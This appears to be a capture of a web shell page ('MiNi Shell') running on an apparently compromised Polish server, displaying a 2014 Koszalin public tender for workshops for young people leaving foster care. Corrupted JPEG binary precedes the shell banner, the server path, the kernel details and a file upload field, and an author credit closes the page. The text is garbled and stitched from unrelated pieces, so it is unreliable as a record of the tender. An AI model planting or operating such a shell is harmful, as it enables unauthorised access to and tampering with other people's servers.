JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140408/120154-N-2014.html

<p class="kh_header"><b>Koszalin: WARSZTATY WYJAZDOWE DLA USAMODZIELNIANYCH WYCHOWANKÓW PLACÓWEK OPIEKUŃCZO WYCHOWAWCZYCH I RODZIN ZASTĘPCZYCH W RAMACH REALIZACJI PROJEKTU SYSTEMOWEGO POMOCNA DŁOŃ PLUS WSPÓŁFINANSOWANEGO ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKEIEGO FUNDUSZU SPOŁECZNEGO PROGRAM OPERACYJNY KAPITAŁ LUDZKI - PRIORYTET VII.</b><br>
<b>Numer ogłoszenia: 120154 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Koszalinie , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. 94 71 40 217, faks 94 71 40 217.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WARSZTATY WYJAZDOWE DLA USAMODZIELNIANYCH WYCHOWANKÓW PLACÓWEK OPIEKUŃCZO WYCHOWAWCZYCH I RODZIN ZASTĘPCZYCH W RAMACH REALIZACJI PROJEKTU SYSTEMOWEGO POMOCNA DŁOŃ PLUS WSPÓŁFINANSOWANEGO ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKEIEGO FUNDUSZU SPOŁECZNEGO PROGRAM OPERACYJNY KAPITAŁ LUDZKI - PRIORYTET VII..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wyjazd warsztatowy dla usamodzielnianych wychowanków placówek opiekuńczo wychowawczych i rodzin zastępczych.
Cel główny:  Wsparcie usamodzielnianych wychowanków pieczy zastępczej w wejściu w samodzielną, świadomą, odpowiedzialną dorosłość
Cele operacyjne:
1.	Nabycie praktycznych umiejętności związanych z planowaniem i realizacją indywidualnego planu usamodzielniania (IPU). 
2.	Rozwój osobowości, budowanie i wzmacnianie pozytywnej samooceny ( trening interpersonalny - drama).
3.	Poznanie  zagrożeń związanych z eksperymentowania z używkami (alkohol, narkotyki, nikotyna).  
4.	Nabycie umiejętności udzielania pierwszej pomocy przedmedycznej.
5.	Rozwiniecie wiedzy dotyczącej edukacji ekologicznej i przyrodniczej
6.	Nabycie umiejętności oceny własnych możliwości (kariera szkolna, wybór zawodu).
7.	Integracja z grupą i zespołem projektowym - gry i zabawy integracyjne, wyjazd do kina/teatru/ na kręgielnię.
8.	Nabycie praktycznych umiejętności związanych z zachowaniem się przy posiłkach, w ośrodku wypoczynkowym, hotelu, w podróży i na szlaku, przestrzegania regulaminów, podstawowych zasad sawuar- vivru
Termin:
09.05.2014r. - 11.05.2014r.
Uczestnicy:
39 -  usamodzielnianych wychowanków biorących udział w projekcie systemowym Pomocna dłoń plus - grupa koedukacyjna  ( 13 chłopców i   26 dziewcząt);
3 wychowawców;
 Szkoleniowcy zgodnie z programem;
1 przedstawiciel Zamawiającego; 

Plan zajęć :
dzień pierwszy 09.05.2014r.:
15:00 - wyjazd (parking obok Amfiteatru) w Koszalinie
16:00 - obiad
16:30 - spotkanie z zespołem projektowym i wychowawcami
17:00 - 18:00  (1 godz.) zajęcia warsztatowe: 
GRUPA I. Zajęcia warsztatowe: Sawuar - vivre (podstawy prawidłowego zachowania się w różnych sytuacjach: przy stole, w urzędzie, w hotelu, w podróży, na szlaku). 
                 Prowadzący: pedagog z udokumentowanym doświadczeniem w prowadzeniu zajęć z sawuar- vivre
GRUPA II. Zajęcia warsztatowe: Zagrożenia wynikające z eksperymentowania z używkami              (alkohol, narkotyki, nikotyna)
                Prowadzący: specjalista ds. uzależnień posiadający udokumentowane doświadczenie w pracy z młodzieżą
18:00 - 18:15  (przerwa) serwis kawowy
18:15 - 19:15 (1 godz.) zajęcia warsztatowe: 
GRUPA II. Zajęcia warsztatowe: Sawuar - vivre (podstawy prawidłowego zachowania się w różnych sytuacjach: przy stole, w urzędzie, w hotelu, w podróży, na szlaku).             
                 Prowadzący: pedagog z udokumentowanym doświadczeniem w prowadzeniu zajęć z sawuar- vivre

                    
GRUPA I. Zajęcia warsztatowe: Zagrożenia wynikające z eksperymentowania z używkami              (alkohol, narkotyki, nikotyna)            
                        Prowadzący: specjalista ds. uzależnień posiadający udokumentowane doświadczenie w pracy z młodzieżą
19:30  kolacja 
Dzień drugi 10.05.2014r.:
8:00 - 9:00 - śniadanie
9:30 - 14:00 - (4,5 godz ) Edukacja ekologiczna i przyrodnicza - Hortulus Dobrzyca.                                                  
                                           Prowadzący: przewodnicy ogrodu
11:30 - 12:00   (w przerwie) serwis kawowy i poczęstunek 
14:00 - obiad
 15:00  - 16:00 (1 godz.) zajęcia warsztatowe
 GRUPA I. Zajęcia warsztatowe: Pierwsza pomoc przedmedyczna 
                                       Prowadzący: ratownik medyczny 
GRUPA II. Zajęcia warsztatowe: Kariera szkolna. Wybór zawodu.
                                       Prowadzący: doradca zawodowy
16:00- 16:30 serwis kawowy 
 16:30  - 17:30 (1 godz.) zajęcia warsztatowe
GRUPA II. Zajęcia warsztatowe: Pierwsza pomoc przedmedyczna 
                                       Prowadzący: ratownik medyczny 
GRUPA I. Zajęcia warsztatowe: Kariera szkolna. Wybór zawodu.
                                       Prowadzący: doradca zawodowy
17:30 - 19:00 Czas wolny - indywidualne spotkania z członkami zespołu projektowego
19:00   Kolacja 
19:30 - Wyjazd do kina/ teatru/ na kręgle (po wcześniejszym uzgodnieniu repertuaru)    
Dzień trzeci 11.05.2014r.:
8:00-9:00 - śniadanie 
9:00 - 11::30  (2,5 godz.) zajęcia warsztatowe: 
 GRUPA I. Planowanie i realizacja indywidualnego planu usamodzielniania (IPU)
 GRUPA II. Trening zachowań asertywnych - drama
                                      Prowadzący dla grupy I : pedagog/pracownik socjalny posiadający udokumentowane doświadczenie w tworzeniu IPU
                                      Prowadzący dla grupy II : pedagog/ specjalista dramy
11:30 - 11:45  (przerwa) serwis kawowy
11:45 - 14:15  (2,5 godz.) zajęcia warsztatowe: 
GRUPA I. Trening zachowań asertywnych - drama
GRUPA II . Planowanie i realizacja indywidualnego planu usamodzielniania (IPU)
                                      Prowadzący dla grupy I : pedagog/ specjalista dramy
                                    Prowadzący dla grupy II : pedagog/pracownik socjalny posiadający udokumentowane doświadczenie w tworzeniu IPU
14:30 obiad
15:00 wyjazd  - odwiezienie uczestników na parking przy  dworcu PKP w Koszalinie)

Wymagania Zamawiającego wobec realizatora warsztatów:
Warsztaty o charakterze stacjonarnym nad morzem na terenie powiatu koszalińskiego. Miejsce zakwaterowania musi posiadać odpowiedni standard.  Uczestnicy mają mieć zapewnione:
-  zakwaterowanie:  2 noclegi w pokojach dwuosobowych, łóżka jednoosobowe,  każdy pokój z własnym węzłem sanitarnym, TV, Internet, dostępem do czajnika i szklanek. W pokoju obowiązkowo woda mineralna gazowana i niegazowana w ilości zabezpieczającej potrzeby uczestników. W łazienkach: szampon, mydło i 2 ręczniki dla każdego uczestnika. Zaproponowane warunki nie powinny budzić wątpliwości co do jakości usług;
- miejsce pobytu musi być jednocześnie miejscem prowadzenia zajęć;
- w trakcie pobytu młodzieży miejsca sprzedaży i spożywania alkoholu na terenie Ośrodka  będą zamknięte, 
- pokoje jednoosobowe wychowawców  muszą znajdować  się w bezpośrednim sąsiedztwie z pokojami wychowanków;
- pokój jednoosobowy przedstawiciela Zamawiającego;
- salę szkoleniową swobodnie mieszczącą 45 osób. Sala musi posiadać niezbędne wyposażenie techniczne: rzutnik multimedialny, laptop, ekran, dobrą akustykę oraz system nagłośnienia, tablicę do pisania, flipcharty, rolety zaciemniające (lub inny sposób zasłaniania okien),krzesła, stoły, przedmioty i materiały służące do charakteryzacji uczestników dramy, materiały pisarskie do prowadzenia zajęć (papier, długopisy, flamastry
-  wyżywienie : 2 śniadania, 3 obiady składające się z zupy podawanej w wazach, drugiego dania, zestawu surówek ,kompotu i deseru w formie stołu szwedzkiego, 2 kolacje,  serwis kawowy w przerwach prowadzonych zajęć, składający się z kawy, herbaty, wody mineralnej gazowanej i niegazowanej w ilości zabezpieczającej potrzeby uczestników, soku, ciasta,  ciastek, cukru, mleka, owoców tj. jabłek, bananów, mandarynek, pomarańczy, winogron w ilości zabezpieczającej potrzeby uczestników.  Śniadania , obiady i kolacje obowiązkowo w formie stołu szwedzkiego. 
- poczęstunek: w trakcie pobytu w Hortulusie Dobrzyca ( lody lub deser, napój zimny lub ciepły  w zależności od warunków atmosferycznych, po uzgodnieniu z przedstawicielem Zamawiającego) 
- stołówka obowiązkowo w miejscu zakwaterowania: stoły nakryte obrusami, serwetnik, zestawy z przyprawami, wykluczone naczynia jednorazowe;
-  organizację czasu wolnego poza godzinami warsztatów (zajęcia rekreacyjno - ruchowe, salę do ćwiczeń, wyjazd do kina/teatru po uzgodnieniu z przedstawicielem Zamawiającego);
- całodobową opiekę medyczną (apteczka, pielęgniarka w miejscu zakwaterowania młodzieży oraz dostęp do lekarza pierwszego kontaktu, zapewnienie ewentualnego transportu uczestnika do placówki służby zdrowia);
- zapewnienie 3 przewodników dla III grup wychowawczych w trakcie zajęć edukacyjnych prowadzonych w ogrodach Hortulusa w Dobrzycy;
- zapewnienie kadry wychowawców leży po stronie Zamawiającego;
- zapewnienie specjalisty prowadzącego trening interpersonalny - dramę leży po stronie Zamawiającego. 
- wykwalifikowaną kadrę do prowadzenia zajęć warsztatowych (zgodnie z wymogami opisanymi przy poszczególnych cyklach warsztatowych ) Wykonawca jest zobowiązany do przedstawienia  łącznie z ofertą  wraz z udokumentowanymi kwalifikacjami do prowadzenia zajęć oraz konspektami poszczególnych zajęć - do akceptacji zamawiającego;
- zmiany dotyczące kadry prowadzącej zajęcia będą możliwe wyłącznie za zgodą Zamawiającego - najpóźniej na dzień przed rozpoczęciem warsztatów (przy czym kwalifikacje i umiejętności tych osób muszą być porównywalne lub wyższe od kadry zaproponowanej w ofercie),
-   ubezpieczenie uczestników do następstw nieszczęśliwych wypadków w trakcie pobytu i przejazdów (kserokopia polisy zostanie przedstawiona Zamawiającemu najpóźniej na dzień przed wyjazdem);
-  przejazd autokarem z Koszalina do miejsca zakwaterowania i powrót do Koszalina w dniu    zakończenia warsztatów (zgodnie z harmonogramem);
-    przejazd autokarem do kina/kręgielni   i z powrotem;
-    sprawozdanie pisemne z realizacji warsztatów wraz z wizualizacją ( min. 10 zdjęć na płycie DVD) stanowiącą  załącznik do faktury;
- Zamawiający zastrzega sobie prawo do wizytowania miejsca wskazanego w ofercie przed podpisaniem umowy w celu sprawdzenia zgodności oferty z zapisami SIWZ.
Miejsce realizacji zamówienia: teren powiatu koszalińskiego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.24.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca posiada wiedzę i doświadczenie, a w szczególności zrealizował należycie, co najmniej 1 usługę szkoleniową w dziedzinie rozwoju osobistego, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dofinansowanych ze środków Unii Europejskiej, odpowiadające swoim rodzajem usługom szkoleniowym stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat, wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że usługi zostały wykonane należycie. Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie dokumentów załączonych do oferty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nie czynności. Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie dokumentów załączonych do oferty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie dokumentów załączonych do oferty metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty.
Pełnomocnictwo - w przypadku, gdy wykonawcę reprezentuje pełnomocnik, posiadające
         zakres i podpisane przez osoby reprezentujące wykonawcę *.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-	przedłużającej się procedury wyboru najkorzystniejszej oferty dopuszcza się przesunięcie terminu realizacji warsztatów,
-	złożenia odwołania dopuszcza się przesunięcie terminu realizacji warsztatów,
-	losowych uniemożliwiających realizację warsztatów w zakładanym terminie dopuszcza się przesunięcie terminu realizacji warsztatów,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiat.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Koszalinie, ul. Racławicka 13, pokój nr 217..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Koszalinie, ul. Racławicka 13, pokój nr 217..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT SYSTEMOWY POMOCNA DŁOŃ PLUS WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PROGRAM OPERACYJNY KAPITAŁ LUDZKI - PRIORYTET VII..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com